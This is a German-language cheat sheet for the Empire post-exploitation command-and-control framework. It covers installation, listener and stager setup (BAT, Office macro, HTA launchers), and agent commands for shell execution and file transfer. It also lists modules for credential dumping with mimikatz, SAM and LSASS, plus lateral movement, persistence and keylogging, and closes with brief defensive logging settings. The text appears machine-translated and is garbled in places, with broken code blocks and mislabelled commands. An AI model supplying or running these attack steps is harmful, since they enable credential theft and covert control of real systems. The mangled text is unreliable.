Empire Framework Cheat Blatt
Überblick
Empire ist ein post-exploitation Framework, das einen rein-PowerShell 2.0 Windows Agent und einen reinen Python 3 Linux/macOS Agent umfasst. Es bietet eine leistungsfähige Befehls- und Kontrollinfrastruktur (C2) für rote Teamoperationen, Penetrationstests und adversäre Emulation.
ZEIT Warning: Empire ist ein Sicherheitstest-Tool, das nur in Umgebungen verwendet werden sollte, in denen Sie eine ausdrückliche Erlaubnis dazu haben.
Installation
Von GitHub
# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git
# Navigate to the directory
cd Empire
# Run the installation script
sudo ./setup/install.sh
```_
### Verwendung von Docker
```bash
# Pull the Docker image
docker pull bcsecurity/empire:latest
# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```_
### Auf Kali Linux
```bash
# Install from package manager
sudo apt update
sudo apt install powershell-empire
```_
## Basisnutzung
### Starting Empire
```bash
# Start the Empire server
sudo empire
# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>
```_
### Verwendung von Starkiller (GUI)
```bash
# Install Starkiller
npm install -g @starkiller/starkiller
# Run Starkiller
starkiller
```_
## Reich CLI Navigation
| | Command | Description | |
| --- | --- |
| | `help` | Display help menu | |
| | `menu` | Return to the main menu | |
| | `back` | Go back one menu level | |
| | `exit` | Exit Empire | |
| | `usemodule <module>` | Select a module to use | |
| | `usestager <stager>` | Select a stager to use | |
| | `uselistener <listener>` | Select a listener to use | |
| | `interact <agent>` | Interact with an agent | |
| | `searchmodule <term>` | Search for modules | |
## Hörer
### Einen Hörer erstellen
In Empire CLI
listeners uselistener http set Name http_listener set Host 192.168.1.100 set Port 8080 execute
### Gemeinsame Listener Optionen
| | Option | Description | |
| --- | --- |
| | `Name` | Name for the listener | |
| | `Host` | IP/hostname for staging | |
| | `Port` | Port for the listener | |
| | `CertPath` | Certificate path for HTTPS | |
| | `DefaultDelay` | Agent callback delay (in seconds) | |
| | `DefaultJitter` | Jitter in agent callbacks (0.0-1.0) | |
| | `DefaultProfile` | Default communication profile | |
| | `KillDate` | Date for the listener to exit (MM/DD/YYYY) | |
| | `WorkingHours` | Hours for the agent to callback (09:00-17:00) | |
### Hörer Management
List all listeners
listeners
Kill a listener
kill http_listener
View a listener's options
info http_listener
## Bühnen
### Einen Stager generieren
In Empire CLI
usestager windows/launcher_bat set Listener http_listener generate
### Gemeinsame Bühnentypen
| | Stager | Description | |
| --- | --- |
| | `windows/launcher_bat` | BAT file launcher | |
| | `windows/launcher_vbs` | VBS script launcher | |
| | `windows/launcher_powershell` | PowerShell launcher | |
| | `multi/launcher` | Multi-platform launcher | |
| | `osx/launcher` | macOS launcher | |
| | `linux/launcher` | Linux launcher | |
| | `windows/dll` | DLL launcher | |
| | `windows/macro` | Office macro launcher | |
| | `windows/hta` | HTA launcher | |
## Agenten
### Agent Commands
List all agents
agents
Interact with an agent
interact C2AGENT123
Get agent info
info
Execute a shell command
shell whoami
Run a PowerShell command
powershell Get-Process
Upload a file
upload /path/to/local/file /path/on/target
Download a file
download /path/on/target /local/path
Take a screenshot
screenshot
Exit agent menu
back
### Personalmanagement
Rename an agent
rename C2AGENT123 new_name
Kill an agent
kill C2AGENT123
Remove an agent from the database
remove C2AGENT123
Set sleep interval
sleep 30
Set jitter percentage
sysinfo
## Module
### Module verwenden
List available modules
usemodule
Search for modules
searchmodule credentials
Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user
Set module options
set Username administrator
Execute the module
execute
### Allgemeine Modulkategorien
#### Zugang zu Informationen
Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords
Dump SAM database
usemodule powershell/credentials/sam
Dump LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump
#### Situationsbewusstsein
Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user
Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer
Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group
#### Spätere Bewegung
WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi
PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec
WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm
#### Persistenz
Registry persistence
usemodule powershell/persistence/userland/registry
Scheduled task persistence
usemodule powershell/persistence/userland/schtasks
WMI persistence
usemodule powershell/persistence/elevated/wmi
## Erweiterte Funktionen
### Malleable C2 Profile
In Empire CLI
profiles use default set DefaultProfile /path/to/profile.profile
### OPSK Erwägungen
Set agent kill date
set KillDate 01/01/2025
Set working hours
set WorkingHours 09:00-17:00
Increase agent sleep time
sleep 300 30
### Daten Exfiltration
Use keylogging module
usemodule powershell/collection/keylogger
Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor
Use screenshot module
usemodule powershell/collection/screenshot ```_
Fehlerbehebung
Gemeinsame Themen
- ** Probleme der Kontaktaufnahme* * ```bash # Check if the listener is running listeners
# Verify firewall settings sudo iptables -L
# Check for port conflicts
netstat -tuln|grep
```_
- Agent nicht überprüfen In ```bash # Verify agent is running agents
# Check for network connectivity issues # Verify sleep/jitter settings
```_
- *Module Ausführunfälle * ```bash # Check module requirements info
# Verify agent privileges shell whoami
# Try running in a different process context usemodule powershell/management/psinject
```_
Defensive Maßnahmen
Nachweismethoden
- PowerShell Script Block Log
- PowerShell Modul Protokollierung
- AMSI (Antimalware Scan Interface)
- Verkehrsanalyse
- Verhaltensanalyse
Präventionstechniken
```powershell
Enable PowerShell Script Block Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
Enable PowerShell Module Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage" ```_
Ressourcen
- [BC Security GitHub](__LINK_4___ -%20Empire%20Wiki
- Starkiller GitHub
- [MITRE ATT&CK; - Empire](__LINK_4___
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Empire in Sicherheitstests. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *